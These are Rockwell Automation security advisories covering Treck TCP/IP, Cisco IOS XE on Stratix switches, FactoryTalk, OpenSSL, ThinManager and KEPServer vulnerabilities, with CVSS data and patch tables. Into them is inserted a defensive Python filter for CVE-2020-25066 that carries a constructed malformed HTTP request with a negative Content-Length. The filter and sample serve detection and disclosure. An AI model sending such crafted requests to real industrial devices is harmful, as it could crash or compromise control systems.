A vulnerability in the Treck HTTP Server component allows an attacker to cause a denial-of-service condition. This vulnerability may also result in arbitrary code execution.

CVSSv3.1 Score: 9.8/CRITICAL
CVSS Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
End Update 3.0


CVE-2020-11901
There is an improper input validation issue in the DNS resolver component when handling a sent packet. A remote, unauthenticated attacker may be able to inject arbitrary code on the target system using a maliciously crafted packet.

CVSSv3.1 Score: 9.1/CRITICAL
CVSS Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2020-11906
There is an improper input validation issue in the Ethernet Link Layer component. An adjacent, unauthenticated attacker can send a malicious Ethernet packet that can trigger an integer underflow event leading to a crash or segment fault on the target device.

CVSSv3.1 Score: 5.0/MEDIUM
CVSS Vector String: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

CVE-2020-11907
There is an improper handling of length parameter consistency issue in the TCP component. A remote, unauthenticated, attacker can send a malformed TCP packet that can trigger an integer underflow event leading to a crash or segmentation fault on the device.

CVSSv3.1 Score: 5.0/MEDIUM
CVSS Vector String: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

CVE-2020-11910
There is an improper input validation issue in the ICMPv4 component. A remote, unauthenticated attacker can send a malicious packet that may expose data present outside the bounds of allocated memory.

CVSSv3.1 Score: 3.7/LOW
CVSS Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

CVE-2020-11911
There is an improper access control issue in the ICMPv4 component. A remote, unauthenticated attacker can send a malicious packet that can lead to higher privileges in permissions assignments for some critical resources on the destination device.

CVSSv3.1 Score: 3.7/LOW
CVSS Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

CVE-2020-11912
There is an improper input validation issue in the IPv6 component. A remote, unauthenticated attacker can send a malicious packet that may expose some data that is present outside the bounds of allocated memory.

CVSSv3.1 Score: 3.7/LOW
CVSS Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

CVE-2020-11914
There is an improper input validation issue in the ARP component. An unauthenticated, local attacker can send a malicious Layer-2 ARP packet that could lead to unintended exposure of some sensitive information on the target device.

CVSSv3.1 Score: 3.1/LOW
CVSS Vector String: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

Update 2.1: Rockwell Automation is aware of the additional Treck TCP/IP Stack vulnerabilities disclosed (ICSA-20-353-01). The potential impact of these vulnerabilities is currently being investigated and this advisory will be updated when the investigation concludes.

Risk Mitigation & User Action

Currently, Rockwell Automation is working to address these vulnerabilities and will continue to provide updates as these fixes become available. Please subscribe to updates to this advisory and the Industrial Security Advisory Index (Knowledgebase ID 54102) to stay notified.
CVE | Suggested Actions
CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912, CVE-2020-11914:

For successful exploitation, these vulnerabilities require malformed TCP/IP packets to reach the destination device and an active network connection. To reduce risk, customers should ensure they are employing proper network segmentation and security controls. Specifically, network exposure for all control system devices should be minimized, and control systems should be behind firewalls and isolated from other networks when possible. Refer to the Converged Plantwide Ethernet (CPwE) Design and Implementation Guide for best practices for deploying network segmentation and broader defense-in-depth strategies.

The CERT/CC has provided IDS rules to support additional mitigations for these vulnerabilities. These rules can be found on their GitHub page.

ICS-CERT has provided additional network mitigations in their public disclosure.

Begin Update 3.0:
CVE | Suggested Actions
CVE-2020-25066 | Follow suggested actions above and, when possible, implement firewall rules to filter out packets that contain a negative content length in the HTTP header.

ICS-CERT has provided additional network mitigations in their public disclosure.

End Update 3.0


Available Fixes:

Update 4.0 May 17, 2022
CVE | Affected Product | Suggested Actions
CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912 | 5069-AENTR | Apply firmware v4.012 or later (Download).
CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912 | 5094-AEN2SFPR/XT, 5094-AEN2TR/XT, 5094-AENSFPR/XT, 5094-AENTR/XT | Apply firmware v5.012 or later (Download).
CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912, CVE-2020-11914 | Kinetix 5700 | Apply v13 or later (Download).
CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912 | PowerFlex 755T, PowerFlex 6000T | Apply 6.005 or later for PF755T. Apply R8 or later for PF6000T. (Download)

Update 5.0 November 1, 2022
CVE | Affected Product Family | Suggested Actions
CVE-2020-25066 | 1734-AENT/R | Apply firmware 7.011 or later.
CVE-2020-25066 | 1738-AENT/R | Apply firmware 6.011 or later.
CVE-2020-25066 | 1794-AENTR, 1794-AENTR/XT | Apply firmware 2.011 or later.
CVE-2020-25066 | 1732E-16CFGM12R, 1732E-8X8M12DR, 1732E-IB16M12DR, 1732E-IB16M12R, 1732E-OB16M12DR, 1732E-OB16M12R | Apply firmware 3.011 or later.
CVE-2020-25066 | 1799ER-IQ10XOQ10 | Apply firmware 3.011 or later.
CVE-2020-25066 | 1732E-12X4M12QCDR, 1732E-16CFGM12QCR, 1732E-16CFGM12QCWR, 1732E-12X4M12P5QCDR, 1732E-16CFGM12P5QCR | Apply firmware 3.011 or later.
CVE-2020-25066 | 1732E-16CFGM12P5QCWR | Apply firmware 3.011 or later.

Begin Update 6.0
CVE | Affected Product Family | Suggested Actions
CVE-2020-25066 | PowerFlex 527 | Follow suggested actions above and, when possible, implement firewall rules to filter out packets that contain a negative content length in the HTTP header.
End Update 6.0
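The header check behind the firewall rule recommended for CVE-2020-25066 (in the Update 3.0 suggested actions and repeated in the PowerFlex 527 row above), written out as an added example that is not Rockwell Automation or Treck code: it classifies a raw HTTP request by its Content-Length header and returns a drop decision. The sample requests are constructed, and the "malformed" and "conflict" verdicts go beyond the advisory's negative-length condition by applying the same strict parsing to neighbouring bad values.

```python
"""Content-Length check behind the PN1508 firewall rule for CVE-2020-25066.

Added example, not Rockwell Automation or Treck code. The advisory asks for
firewall rules that drop HTTP requests whose Content-Length header carries a
negative value; this module shows that header check in isolation so it can be
reviewed or reused in a packet filter or IDS preprocessor.
"""
from __future__ import annotations

# Verdicts that a filter implementing the advisory's rule should drop.
# 'negative' is the advisory's condition; 'malformed' and 'conflict' are the
# same strict-parsing posture applied to neighbouring bad values (added
# generalisation, not from the advisory).
DROP_VERDICTS = frozenset({"negative", "malformed", "conflict"})


def header_lines(raw_request: bytes) -> list[bytes] | None:
    """Return the header lines of an HTTP/1.x request, or None if incomplete.

    Accepts CRLF or bare LF line endings. The head ends at the first empty
    line; the request line itself is not returned. Obsolete line folding is
    not handled: a folded continuation line has no ':' and is skipped later.
    """
    lines = raw_request.splitlines()  # bytes.splitlines: \n, \r and \r\n
    if b"" not in lines:
        return None
    return lines[1:lines.index(b"")]


def header_values(lines: list[bytes], name: bytes) -> list[bytes]:
    """Collect every value of header `name` (case-insensitive).

    A comma-separated value is split into its elements, since RFC 7230
    treats `Content-Length: 42, 42` as two occurrences of the field.
    """
    target = name.lower()
    values: list[bytes] = []
    for line in lines:
        field, sep, value = line.partition(b":")
        if not sep or field.strip().lower() != target:
            continue
        values.extend(v.strip() for v in value.split(b","))
    return values


def content_length_verdict(raw_request: bytes) -> str:
    """Classify a raw request by its Content-Length header.

    Returns one of:
      'incomplete' - header block not yet terminated by an empty line
      'absent'     - no Content-Length header present
      'ok'         - one consistent value made of decimal digits only
      'negative'   - a value starting with '-' (the condition the advisory names)
      'malformed'  - a value that is not 1*DIGIT, such as '+5', '0x10' or ''
      'conflict'   - several Content-Length values that disagree
    """
    lines = header_lines(raw_request)
    if lines is None:
        return "incomplete"
    values = header_values(lines, b"Content-Length")
    if not values:
        return "absent"
    if any(v.startswith(b"-") for v in values):
        return "negative"
    # Reject anything that is not plain ASCII digits instead of coercing it,
    # so a lenient int() parse can never quietly accept a bad length.
    if not all(v.isdigit() for v in values):
        return "malformed"
    if len({int(v) for v in values}) > 1:
        return "conflict"
    return "ok"


def should_drop(raw_request: bytes) -> bool:
    """Filter decision for one request: True when it must not be forwarded."""
    return content_length_verdict(raw_request) in DROP_VERDICTS


# Constructed sample requests for the demonstration (not captured traffic).
SAMPLE_OK = (b"POST /index.html HTTP/1.1\r\nHost: io-module.example\r\n"
             b"Content-Length: 5\r\n\r\nhello")
SAMPLE_NEGATIVE = (b"POST /index.html HTTP/1.1\r\nHost: io-module.example\r\n"
                   b"content-length: -1\r\n\r\n")
SAMPLE_CONFLICT = (b"POST /index.html HTTP/1.1\r\nContent-Length: 5\r\n"
                   b"Content-Length: 7\r\n\r\nhello")

if __name__ == "__main__":
    for label, request in (("ok", SAMPLE_OK), ("negative", SAMPLE_NEGATIVE),
                           ("conflict", SAMPLE_CONFLICT)):
        print(f"{label:9s} verdict={content_length_verdict(request):10s} "
              f"drop={should_drop(request)}")
```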

 

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Utilize proper network infrastructure controls, such as firewalls, to help ensure that ICMPv4, TCP, ARP and DNS traffic originating from unauthorized sources is blocked.
  • Ensure that software-based firewalls are running with current rule sets and enforced on individual systems.

Software/PC-based Mitigation Strategies
  • Use of Microsoft® AppLocker or other similar whitelisting application can help mitigate risk.  Information on using AppLocker with Rockwell Automation® products is available at QA17329 - Using Rockwell Automation Software Products with AppLocker
  • Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

General Mitigations
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

See our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).


ADDITIONAL LINKS
  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • https://kb.cert.org/vuls/id/257161
  • https://us-cert.cisa.gov/ics/advisories/icsa-20-353-01

 

PN1607 | New OpenSSL Vulnerability
Published Date:
October 31, 2022
Last Updated:
October 31, 2022
Products:
FactoryTalk View
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Executive Summary

Rockwell Automation is aware of and currently monitoring the OpenSSL vulnerability that was initially announced on Tuesday, October 25th. On Tuesday, November 1st the full vulnerability details were disclosed, and a patch was made available by the vendor. As part of our commitment to transparency and to protecting our customers’ security, we are evaluating all Rockwell products for this third-party vulnerability. If any products are affected by this vulnerability, we will provide an update to this notification. We look forward to working with our customers to satisfy any concerns they may have.

High
PN1601 | Stratix Products Vulnerable to Multiple Vulnerabilities
Published Date:
October 27, 2022
Last Updated:
October 27, 2022
CVE IDs:
CVE-2020-3209, CVE-2020-3200, CVE-2021-1385, CVE-2020-3516, CVE-2021-1446
Products:
Stratix 5400 Industrial Ethernet Switch, Stratix 5800 Switch, Stratix 5410 Ind Distribution Switch
CVSS Scores:
6.8, 7.2, 8.8, 6.5, 7.7, 8.6, 4.3
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Version 1.0 – October 27, 2022

Executive Summary

Rockwell Automation is aware of multiple vulnerabilities that impact Cisco IOS® XE and Cisco IOS software contained within Stratix® devices. Exploitation of these vulnerabilities could potentially lead to, but is not limited to, a denial-of-service condition and remote code execution.

Customers using affected versions of this software are encouraged to evaluate the following mitigations and apply them where appropriate. Additional details relating to the discovered vulnerabilities, including the products in scope, impact, and recommended countermeasures, are provided. We have not received any notice of these vulnerabilities being exploited in Rockwell Automation products.

Affected Products

  • Stratix 5800 Switches
  • Stratix 5400/5410 Switches

Vulnerability Details

CVE-2020-3229 - Cisco IOS XE Software Web UI Privilege Escalation Vulnerability
CVSS Base Score 8.8/10 (High)
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

The administrator GUI lacks correct handling of RBAC, which may allow a malicious user to send modified HTTP requests to the targeted device. If exploited, a read-only remote attacker could potentially execute commands or configuration changes as the administrator user.

CVE-2020-3219 - Cisco IOS XE Software Web UI Command Injection Vulnerability
CVSS Base Score 8.8/10 (High)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Due to insufficient validation of user input, this vulnerability could allow a malicious user to inject custom input into the web UI. If exploited, a remote attacker could potentially execute arbitrary code with administrative privileges on the operating system.

CVE-2021-1446 - Cisco IOS XE Software DNS NAT Protocol Application Layer Gateway Denial-of-Service Vulnerability
CVSS Base Score 8.6/10 (High)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

A vulnerability in the DNS application layer gateway (ALG) functionality used by Network Address Translation (NAT) in Cisco IOS XE software could allow an unauthenticated, remote attacker to cause an affected device to reload.

CVE-2020-3200 - Cisco IOS and IOS XE Software Secure Shell Denial-of-Service Vulnerability
CVSS Base Score 7.7/10 (High)
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

A vulnerability in the Secure Shell (SSH) server code of Cisco IOS software and Cisco IOS XE software could allow an authenticated, remote attacker to cause an affected device to reload.

CVE-2020-3211 - Cisco IOS XE Software Web UI Command Injection Vulnerability
CVSS Base Score 7.2/10 (High)
CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Due to improper input sanitization, this vulnerability could allow a malicious user with administrative privileges to submit specially crafted input in the web UI. If exploited, a remote attacker could potentially execute arbitrary commands with root privileges on the operating system.

CVE-2020-3218 - Cisco IOS XE Software Web UI Remote Code Execution Vulnerability
CVSS Base Score 7.2/10 (High)
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Due to improper validation of user supplied input, a malicious user could potentially create a file on the target device and upload a second malicious file to the device. If exploited, a user could execute arbitrary code with root privileges on the underlying Linux shell.

CVE-2020-3209 - Cisco IOS XE Software Digital Signature Verification Bypass Vulnerability
CVSS Base Score 6.8/10 (Medium)
CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

The root cause of this vulnerability is an improper check in the code area that manages the verification of the digital signatures of the system files during the initial boot process. If exploited, a malicious user could potentially install and boot a malicious software image or execute unsigned binaries on the targeted device. A malicious user could exploit this vulnerability by loading unsigned software on the affected device.

CVE-2021-1385 - Cisco IOx Application Environment Path Traversal Vulnerability
CVSS Base Score 6.5/10 (Medium)
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N

A vulnerability in the Cisco IOx application hosting environment of multiple Cisco platforms could allow an authenticated, remote attacker to conduct directory traversal attacks and read and write files on the underlying operating system or host system.

CVE-2020-3516 - Cisco IOS XE Software Web UI Improper Input Validation Vulnerability
CVSS Base Score 4.3/10 (Medium)
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

A vulnerability in the web server authentication of Cisco IOS XE Software could allow an authenticated, remote attacker to crash the web server on the device.

Risk Mitigation & User Action

These vulnerabilities have been addressed in newer versions of the Stratix 5800 switch. Customers are also directed towards the risk mitigations provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Products Affected | Vulnerabilities | Suggested Actions
Stratix 5800 switches | CVE-2020-3209, CVE-2020-3211, CVE-2020-3218, CVE-2020-3229, CVE-2020-3219, CVE-2020-3516, CVE-2021-1385, CVE-2021-1446 | Update to Stratix 5800 v.17.04.01 or later
Stratix 5800 switches | CVE-2020-3200 | Update to v16.12.01 or later
Stratix 5400/5410 switches | CVE-2020-3200 | Update to v15.2(7)E2 or later

Additionally, please see our Knowledgebase article, QA43240 - Recommended Security Guidelines from Rockwell Automation, for additional recommendations to maintain the security posture of your environment.

References

  • Cisco IOS XE Software Web UI Privilege Escalation Vulnerability
  • Cisco IOS XE Software Web UI Command Injection Vulnerability
  • Cisco IOS XE Software DNS NAT Protocol Application Layer Gateway Denial-of-Service Vulnerability
  • Cisco IOS and IOS XE Software Secure Shell Denial of Service Vulnerability
  • Cisco IOS XE Software Web UI Command Injection Vulnerability
  • Cisco IOS XE Software Web UI Remote Code Execution Vulnerability
  • Cisco IOS XE Software Digital Signature Verification Bypass Vulnerability
  • Cisco IOx Application Environment Path Traversal Vulnerability
  • Cisco IOS XE Software Web UI Improper Input Validation Vulnerability

High
PN1605 | FactoryTalk Alarm and Events Server Vulnerable to Denial-Of-Service Attack
Published Date:
October 27, 2022
Last Updated:
October 16, 2024
CVE IDs:
CVE-2022-38744
Products:
FactoryTalk View SE, Studio 5000 View Designer
CVSS Scores (v3.1):
7.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
Yes

Revision History
Version 1.0 – October 27, 2022

Executive Summary

Rockwell Automation received a report from Kaspersky Labs regarding one vulnerability in FactoryTalk® Alarms and Events servers. If successfully exploited, this vulnerability may result in a denial-of-service condition causing the server to be unavailable.

Customers using affected versions of this software are encouraged to evaluate the following mitigations and apply them appropriately to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided.

Affected Products

FactoryTalk Alarms and Events server – All versions

Vulnerability Details

CVE-2022-38744 FactoryTalk Alarm and Events server vulnerable to denial-of-service attack
An unauthenticated attacker with network access to a victim's FactoryTalk service could open a connection, causing the service to fault and become unavailable. The affected port serves as a server ping port and uses messages structured as XML.

CVSS v3.1 Base Score: 7.5/10[MEDIUM]
CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Risk Mitigation & User Action

Customers using the affected software are encouraged to set up the secondary mitigation as described below that addresses the associated risk. Customers are also directed towards general risk mitigation strategies provided in QA43240 - Recommended Security Guidelines from Rockwell Automation, in our Knowledgebase.
Vulnerability Suggested Actions
CVE-2022-38744 Customers should set up IPsec to mitigate this issue as detailed in QA46277 - Deploying FactoryTalk Software with IPsec

General Security Guidelines

General security guidelines can be found in QA43240 - Recommended Security Guidelines from Rockwell Automation.

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com).

Additional Links

  • PN1354 - Industrial Security Advisory Index
  • CVE-2022-38744 JSON

 

Critical
PN1606 | FactoryTalk VantagePoint Software Broken Access Control and Input Validation Vulnerability
Published Date:
October 07, 2022
Last Updated:
October 07, 2022
CVE IDs:
CVE-2022-3158, CVE-2022-38743
Products:
FactoryTalk Linx OPC UA Connector
CVSS Scores:
9.9
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision Number
1.0

Revision History
Version 1.0 – October 06, 2022

Executive Summary

Rockwell Automation is aware of a broken access control and input validation vulnerability. If exploited, this vulnerability could potentially have a high impact on the confidentiality, and a low impact on the integrity and availability, of FactoryTalk® VantagePoint® software.

Customers using affected versions of this software are encouraged to evaluate the following mitigations and apply them where appropriate. Additional details relating to the discovered vulnerability, including the products in scope, impact, and recommended countermeasures, are provided. We have not received any notice of this vulnerability being exploited in Rockwell Automation products.

Affected Products

FactoryTalk VantagePoint software v. 8.0, 8.10, 8.20, 8.30, 8.31

Vulnerability Details

CVE-2022-38743 FactoryTalk VantagePoint Software Broken Access Control Vulnerability
As a part of our commitment to security, Rockwell Automation performs routine testing and vulnerability scanning to maintain the security posture of products. During penetration testing, we discovered a broken access control vulnerability. The FactoryTalk VantagePoint SQLServer account could allow a malicious user with read-only privileges to execute SQL statements in the back-end database.

CVSS Base Score: 9.9/10 (Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CVE-2022-3158 FactoryTalk VantagePoint Software Input Validation Vulnerability
Additionally, the device lacks input validation when users enter SQL statements to retrieve information from the back-end database. This vulnerability could potentially allow a user with basic user privileges to perform remote code execution on the server.

CVSS Base Score: 9.9/10 (Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Risk Mitigation & User Action

Customers using the affected software are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are encouraged to apply the following configurable risk mitigations to help reduce the risk associated with this vulnerability. We also recommend customers combine risk mitigations with security best practices to employ a defense in depth approach.
Mitigation | Suggested Actions
Mitigation A | Update to FactoryTalk VantagePoint V8.00/8.10/8.20/8.30/8.31 or later. See BF28452 - Patch: Multiple issues, FactoryTalk VantagePoint 8.00/8.10/8.20/8.30/8.31.
Mitigation B | If customers are unable to update the firmware, we suggest customers configure the database to follow the least privilege principle.

Additional Links

  • CVE-2022-38743
  • CVE-2022-3158

High
PN1595 | OpenSSL Infinite Loop in Rockwell Automation Products
Published Date:
September 23, 2022
Last Updated:
January 28, 2025
CVE IDs:
CVE-2022-0778
CVSS Scores:
7.5, 4.9
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes

Revision History
Version 1.2 - 28-Jan-2025, Updated Impacted Products (Stratix 4300)
Version 1.1 – 8-Sept-2022, Updated Suggested Actions

Executive Summary

Rockwell Automation received a report on a new vulnerability within OpenSSL, which is used within some of our products. This vulnerability can lead to a denial-of-service within the affected products if successfully launched by an attacker.

Customers using affected versions of this software are encouraged to evaluate the following mitigations provided and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided in this security advisory.

Affected Products

  • ThinManager® software (Versions 12.0.0 - 12.0.2, 12.1.0 - 12.1.3)
  • FactoryTalk® Linx Gateway (Version 6.30 and earlier)
  • FactoryTalk Linx OPC UA Connector (Version 6.30 and earlier)
  • FactoryTalk View (Version 11.00 - Version 13.00)
  • Stratix 4300 (Versions 4.0.1.117 and earlier)

Vulnerability Details

CVE-2022-0778 OpenSSL allows for an infinite loop

This vulnerability causes the OpenSSL library to enter an infinite loop when parsing an invalid certificate and can result in a denial-of-service (DoS) to the application. An attacker does not need a verified certificate to exploit this vulnerability because parsing a bad certificate triggers the infinite loop before the verification process is completed.

CVSS v3.1 Base Score: 7.5/10[HIGH]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2022-0778 OpenSSL allows for an infinite loop (*This CVE score only applies to ThinManager)

This vulnerability causes the OpenSSL library to enter an infinite loop when parsing an invalid certificate and can result in a denial-of-service (DoS) to the application. An attacker does not need a verified certificate to exploit this vulnerability because parsing a bad certificate triggers the infinite loop before the verification process is completed.

Administrator privileges are needed for this attack to be successful on ThinManager Software.

CVSS v3.1 Base Score: 4.9/10[MEDIUM]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H

Risk Mitigation & User Action

Customers are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.

Products Affected | Suggested Actions
ThinManager | This issue has been patched. Customers should follow the patch instructions as follows: if using v12.0.0-12.0.2, download v12.0.3; if using v12.1.0-12.1.3, download v12.1.4.
FactoryTalk Linx Gateway | Customers should view BF28103 - Patch: OpenSSL Vulnerability, OPC UA Connector 6.20, 6.21, 6.30 to install the update that mitigates the issue.
FactoryTalk Linx OPC UA Connector | Customers should view BF28103 - Patch: OpenSSL Vulnerability, OPC UA Connector 6.20, 6.21, 6.30 to install the update that mitigates the issue.
FactoryTalk View | Customers should view BF28297 - Patch: Open SSL Vulnerability, FactoryTalk View 11.0, 12.0, 13.0 to install the update that mitigates the issue.
Stratix 4300 | The issue has been patched. Customers should upgrade to v4.0.2.101 (Download Center).

If an upgrade is not possible or available, customers should consider implementing the following mitigations:
  • Use of Microsoft® AppLocker or other similar allow list applications can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article QA17329 - Using Rockwell Automation Software Products with AppLocker.
  • Confirm that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

General Security Guidelines

  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, see Knowledgebase Article PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as connected devices.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation, and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Additional Links

  • PN1354 - Industrial Security Advisory Index
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide

High
PN1604 | ThinManager Software Vulnerable to Arbitrary Code Execution and Denial-of-Service Attack
Published Date: September 22, 2022
Last Updated: September 22, 2022
CVE IDs: CVE-2022-38742
Products: ThinManager
CVSS Scores: 8.1
Known Exploited Vulnerability (KEV): No
Corrected: No
Workaround: No

Revision History
Version 1.0 – September 22, 2022 – Initial Version

Executive Summary

A vulnerability was discovered by rgod working with Trend Micro’s Zero Day Initiative and reported to Rockwell Automation.  The vulnerability was discovered in the ThinManager® ThinServer™ software. Successful exploitation of this vulnerability could allow an attacker to make the software unresponsive or execute arbitrary code.

Customers using the products in scope are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerabilities, including recommended countermeasures, are listed below.

Affected Products

ThinManager ThinServer software Versions
11.0.0 – 11.0.4
11.1.0 – 11.1.4
11.2.0 – 11.2.5
12.0.0 – 12.0.2
12.1.0 – 12.1.3
13.0.0

Vulnerability Details

CVE-2022-38742 ThinManager ThinServer Heap-Based Overflow

CVSS Base Score: 8.1 /10 (High)
CVSS 3.1 Vector String: AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

In affected versions, an attacker can send a specifically crafted TFTP or HTTPS request causing a heap-based buffer overflow that crashes the ThinServer process.  This potentially exposes the server to arbitrary remote code execution.

Risk Mitigation & User Action

Customers are directed towards the risk mitigations provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
CVE-2022-38742
Versions Affected      Suggested Actions
11.0.0 – 11.0.4        Update to v11.00.05
11.1.0 – 11.1.4        Update to v11.01.05
11.2.0 – 11.2.5        Update to v11.02.06
12.0.0 – 12.0.2        Update to v12.00.03
12.1.0 – 12.1.3        Update to v12.01.04
13.0.0                 Update to v13.00.01

Additional Mitigations

If users are unable to update to the patched version, they should put the following mitigation in place:
  • Block network access to the ThinManager TFTP and HTTPS ports from endpoints other than ThinManager managed thin clients
For additional security best practices, please see our Knowledgebase article, QA43240 - Security Best Practices, to maintain the security posture of your environment.

References

CVE-2022-38742

Critical
PN1603 | KEPServer Enterprise Vulnerable to Remote Code Execution and Denial-of-Service Attack
Published Date: September 01, 2022
Last Updated: September 01, 2022
CVE IDs: CVE-2022-2825, CVE-2022-2848
Products: KEPServer Enterprise
CVSS Scores: 9.1, 9.8
Known Exploited Vulnerability (KEV): No
Corrected: No
Workaround: No

Revision History
Version 1.0 – September 1, 2022 – Initial Version

Executive Summary

Rockwell Automation was notified by ICS-CERT of vulnerabilities discovered in Kepware® KEPServerEX, which affects the Rockwell Automation KEPServer Enterprise. Successful exploitation of these vulnerabilities could allow an attacker to crash the device or remotely execute arbitrary code.

Customers using the products in scope are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details are provided relating to the discovered vulnerabilities, including recommended countermeasures.

Affected Products

KEPServer Enterprise – All versions prior to v13.01.00

Vulnerability Details

CVE-2022-2848 KEPServer Enterprise Heap-Based Overflow
CVSS Base Score: 9.1 /10 (Critical)
CVSS 3.1 Vector String: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

Specifically crafted OPC UA messages transmitted to the server could allow an attacker to crash the server and leak data.

CVE-2022-2825 KEPServer Enterprise Stack-Based Overflow
CVSS Base Score: 9.8 /10 (Critical)
CVSS 3.1 Vector String: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Specifically crafted OPC UA messages transmitted to the server could allow an attacker to crash the server and remotely execute code.

Risk Mitigation & User Action

Vulnerability                   Suggested Actions
CVE-2022-2848, CVE-2022-2825    Customers should update to version 13.01.00, which mitigates both issues.


